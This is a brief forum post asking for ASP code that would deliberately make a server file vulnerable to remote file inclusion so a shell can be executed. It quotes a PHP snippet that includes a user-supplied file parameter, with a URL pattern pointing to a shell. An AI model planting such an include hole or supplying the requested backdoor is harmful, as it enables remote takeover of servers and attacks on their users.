Hey all, As teh topic name says, i wanna add a Vulnerable Code to asn ASP file so that the asp file becomes Vulnerable to RFI. For example , in php if u add this code : <?php $file=$_GET('file'); include($file); ?> Code (markup): this file becomes vulnerable to RFI ie filename.php?file=php-shell-link So, I want an ASP code that makes the asp file vulnerable so that a shell can be executed on the server. If anyone knows please answer. regards!